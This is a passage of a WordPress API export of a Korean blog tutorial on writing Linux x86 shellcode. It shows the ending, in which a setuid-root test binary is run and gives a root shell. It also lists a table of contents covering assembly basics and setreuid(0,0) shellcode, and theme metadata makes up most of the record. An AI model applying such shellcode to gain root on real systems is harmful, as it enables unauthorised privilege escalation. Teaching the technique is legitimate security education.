\/>drwxrwxr-x &nbsp;&nbsp; 2 willy &nbsp;&nbsp; willy &nbsp; &nbsp; &nbsp;&nbsp; 4096 Sep 12 19:53 . <br \/>drwxrwxr-x &nbsp; 12 willy &nbsp;&nbsp; willy &nbsp; &nbsp; &nbsp;&nbsp; 4096 Sep&nbsp; 4 07:34 .. <br \/>-rwsr-xr-x &nbsp;&nbsp; 1 root &nbsp; &nbsp; willy &nbsp; &nbsp; &nbsp; 13825 Sep 12 19:53 test45 <br \/><br \/>\uc774\uc81c willy \uad8c\ud55c\uc73c\ub85c test45\ub97c \uc2e4\ud574\uc2dc\ucf1c\ubcf4\uc790.&nbsp; <br \/><br \/>[willy@Null@Root]$ .\/test45 <br \/>sh-2.04# id <br \/>uid=0(root) gid=501(willy) groups=501(willy) <br \/><br \/>\ub4dc\ub514\uc5b4 root shell\uc744 \uc5bb\uc5c8\ub2e4. \uc774\uc81c shellcode \ub9cc\ub4e4\uae30\uac00 \ubaa8\ub450 \ub05d\ub0ac\ub2e4. \uba54\ubaa8\ub9ac\uc758 \uad6c\uc870 \ubd80\ud130 \uc2dc\uc791\ud558\uc5ec,&nbsp; <br \/>\uc5b4\uc148\ube14\ub9ac\uc5b4\uc758 \uae30\ubcf8 \uad6c\uc870\uc640 \uba85\ub839\uc5b4, \uadf8\ub9ac\uace0 system call\uc744 \uc774\uc6a9\ud55c shellcode \uae4c\uc9c0..&nbsp; \uac00\ub2a5\ud55c\ud55c \ubaa8\ub4e0&nbsp; <br \/>\ub0b4\uc6a9\uc744 \uc27d\uac8c \uc774\ud574 \ud560\uc218 \uc788\ub3c4\ub85d \uc124\uba85\ud558\ub824 \ub178\ub825\ud558\uc600\ub2e4. \uc774 \ubb38\uc11c\uac00 shellcode\uc81c\uc791\uc744 \uc774\ud574\ud558\ub294\ub370 \ub3c4\uc6c0\uc774 <br \/>\ub418\uc5c8\uc73c\uba74 \ud558\ub294 \ubc14\ub7a8\uc774\ub2e4. \uc2dc\uac04\uc774 \uc788\ub294 \uc0ac\ub78c\uc740 \/usr\/include\/asm\/unistd.h\uc5d0 \uc788\ub294 300\uc5ec\uac1c\uc758 system <br \/>call \ud568\uc218\ub4e4 \uc911\uc5d0 \uba87\uac00\uc9c0\ub97c \uc774\uc6a9\ud558\uc5ec \uc7ac\ubbf8\uc788\ub294 \uae30\uacc4\uc5b4\ucf54\ub4dc\ub97c \ub9cc\ub4e4\uc5b4 \ubcf4\ub294\uac83\ub3c4 \uc88b\uc744\ub4ef \ud558\ub2e4.&nbsp; <br \/>\uc554\ud2bc \ub0b4\uc6a9\uc911 \uc758\ubb38\uc774 \uc788\uac70\ub098 \uc218\uc815\ud560 \ubd80\ubd84\uc774 \uc788\uc73c\uba74 \uc5b8\uc81c\ub77c\ub3c4 \uc5f0\ub77d \ubc14\ub780\ub2e4.&nbsp; <br \/>\ucc38\uace0\ub85c OS\ub098 CPU\uac00 \ub2e4\ub978 \uacbd\uc6b0 \uba54\ubaa8\ub9ac \ubd80\ubd84\uc774\ub098 \ub808\uc9c0\uc2a4\ud130, \uadf8\ub9ac\uace0 \uc5b4\uc148\ube14\ub9ac\uc758 \uad6c\uc870\uac00 \ub2e4\ub97c\uc218 \uc788\ub2e4.&nbsp; <br \/>\uc774\ubd80\ubd84\uc5d0 \ub300\ud574\uc11c\ub294 bacchante project (http:\/\/165.246.33.21\/bacchante)\uc744 \ucc38\uace0\ud558\uace0 \uac01\uc790 \uc751\uc6a9\ud574&nbsp; <br \/>\ubcf4\uae30 \ubc14\ub780\ub2e4. <br \/><\/P><\/DIV>\n","protected":false},"excerpt":{"rendered":"<p>[\ubaa9\ucc28]1.\uc5b4\uc148\ube14\ub9ac \uae30\ubcf8 \uba85\ub839\uc5b42.\uae30\ubcf8\uc801\uc778 \uc5b4\uc148\ube14\ub9ac \ucf54\ub4dc\uc758 \uc774\ud5743.C\ud504\ub85c\uadf8\ub7a8\uc744 \uc258\ucf54\ub4dc\ub85c \ub9cc\ub4e4\uae30.4.setreuid(0,0)\ud568\uc218 \uc258\ucf54\ub4dc\ub85c \ub9cc\ub4e4\uae30 \ubd80\ub85d : unistd.h 1.\uc5b4\uc148\ube14\ub9ac \uae30\ubcf8 \uba85\ub839\uc5b4\ub77c\ubca8 | \uc624\ud53c\ucf54\ub4dc |\uc81c1\uc624\ud53c\ub79c\ub4dc |\uc81c2\uc624\ud53c\ub79c\ub4dc | \uc124\uba85\ubb38(\uc8fc\uc11d)&#8212;&#8212;+&#8212;&#8212;&#8212;&#8211;+&#8212;&#8212;&#8212;&#8212;+&#8212;&#8212;&#8212;&#8212;+&#8212;&#8212;&#8212;&#8212;&#8211;main: movl %esi, %ebp ; comment +&#8212;&#8212;+&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;+&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;+&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;+ |\uba85\ub839\uc5b4| \uc774\uc6a9 \ubc29\ubc95 | \uba85\ub839\uc5b4\uc758 \uc758\ubbf8 | C\uc5d0\uc11c\uc758 \uc720\uc0ac \ud45c\ud604 |+&#8212;&#8212;+&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;+&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;+&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;+ | mov | movb $0x1,%eax | 1\uc744 eax\uc5d0 \ub123\uc74c.(1 \ubc14\uc774\ud2b8) | eax = 0x01 | | [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_import_markdown_pro_load_document_selector":0,"_import_markdown_pro_submit_text_textarea":"","site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[22],"tags":[],"class_list":["post-93","post","type-post","status-publish","format-standard","hentry","category-development_unix"],"_links":{"self":[{"href":"https:\/\/hasu0707.duckdns.org\/blog\/index.php?rest_route=\/wp\/v2\/posts\/93","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hasu0707.duckdns.org\/blog\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hasu0707.duckdns.org\/blog\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hasu0707.duckdns.org\/blog\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/hasu0707.duckdns.org\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=93"}],"version-history":[{"count":0,"href":"https:\/\/hasu0707.duckdns.org\/blog\/index.php?rest_route=\/wp\/v2\/posts\/93\/revisions"}],"wp:attachment":[{"href":"https:\/\/hasu0707.duckdns.org\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=93"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hasu0707.duckdns.org\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=93"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hasu0707.duckdns.org\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=93"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}